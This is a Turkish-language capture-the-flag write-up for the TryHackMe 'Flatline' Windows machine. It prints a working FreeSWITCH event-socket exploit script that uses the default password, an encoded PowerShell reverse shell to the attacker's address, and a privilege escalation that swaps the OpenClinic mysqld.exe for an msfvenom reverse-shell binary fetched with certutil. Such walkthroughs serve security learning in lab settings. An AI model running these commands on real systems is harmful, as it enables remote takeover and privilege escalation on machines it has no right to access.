Flatline
User Flag
nmap:
1
2
3
4
nmap -sT -Pn -v10 -p- -oA nmap/tcp_full 10.10.34.94
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack
8021/tcp open ftp-proxy syn-ack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
nmap -Pn -O -sC -sV -p3389,8021 -oA nmap/vuln 10.10.34.94
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-02-25T20:52:06+00:00
|_ssl-date: 2022-02-25T20:52:08+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after: 2022-05-10T16:47:35
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): AVtech embedded (87%)
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Kullanıcı adımız ve şifremiz olmadığından öncelikle 8021 numaralı portta çalışan FreeSWITCH servisini inceleyeceğiz.
FTP hizmetine bağlanmayı denedim ancak bir HTTP başlığı gördüm:
1
2
3
4
5
6
ftp 10.10.34.94 8021
Connected to 10.10.34.94.
Content-Type: auth/request
ftp> ls
Not connected.
ftp>
Metasploit framework’ünde FreeSWITCH ile alakalı bir exploit var.
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~]
└─# searchsploit FreeSWITCH
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Fakat çalışmıyor.
1
2
3
4
5
6
7
8
msf6 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set RHOSTS 10.10.34.94
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set LHOST 10.9.1.150
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > exploit
[*] Started reverse TCP double handler on 10.17.8.104:4444
[*] 10.10.76.179:8021 - Login success
[*] 10.10.76.179:8021 - Sending payload (283 bytes) ...
[*] Exploit completed, but no session was created.
Ama /usr/share/exploitdb/exploits/windows/remote/47799.txt dosyasındaki Python script’i çalışıyor.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
searchsploit -x 47799.txt
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)
Script 8021 portuna bir socket açıyor ve ClueCon default parolasını kullanarak oturum açıyor.
Zafiyeti 4 adımda sömürdüm:
1
2
3
4
1. nc 10.10.34.94 8021
2. auth ClueCon
3. nc -nvlp 1234
4. api system "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOQAuADEALgAxADUAMAAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
1
2
PS C:\Users\Nekrotic\Desktop> more user.txt
THM{---}
Aynı klasör içinde root.txt var ama okuyamıyoruz :(
Root Flag
Makinede gezinirken openclinic dosyasına rastladım.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\projects\openclinic> dir
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exe
1
2
3
4
5
6
searchsploit openclinic
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation | windows/local/50448.txt
------------------------------------------------------------------- --------------------------------
Bu dosya ile yetkimizi yükseltebiliriz.
İstirmarın açıklaması:
kali@kali:~$ searchploit -x 50448.txt
Yetkisiz bir kullanıcı mysqld.exe veya Tomcat8.exe’nin adını değiştirebilir. Yetki yükseltmek için bu dosyaları değiştirebiliriz. Yetkisiz kullanıcıda olduğumuz için servisi yeniden başlatamayacağız, fakat makineyi yeniden başlattığımızda nt authority kullanıcısı ile bağlantı sağlayacağız.
msfvenom ile windows için reverse shell oluşturdum ve nc ile portu dinlemeye aldım.
1
2
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.1.150 LPORT=3131 -f exe > mysqld_evil.exe
nc -nvlp 3131
Web servisini çalıştırdım.
1
python3 -m http.server 80
mysqld.exe programını backup dosyası olarak değiştirdim.
1
2
PS C:\> cd C:\projects\openclinic\mariadb\bin
PS C:\projects\openclinic\mariadb\bin> Move-Item mysqld.exe mysqld.bak
Sonrasında oluşturduğum dosyayı makineye gönderdim.
1
2
3
4
5
PS C:\projects\openclinic\mariadb\bin> certutil.exe -urlcache -split -f http://10.9.1.150:80/mysqld_evil.exe mysqld.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
Maikneyi yeniden başlatacağım.
1
PS C:\projects\openclinic\mariadb\bin> Restart-Computer
Bir süre beklediğimizde reverse shell çalışacak.
This post is licensed under CC BY 4.0 by the author.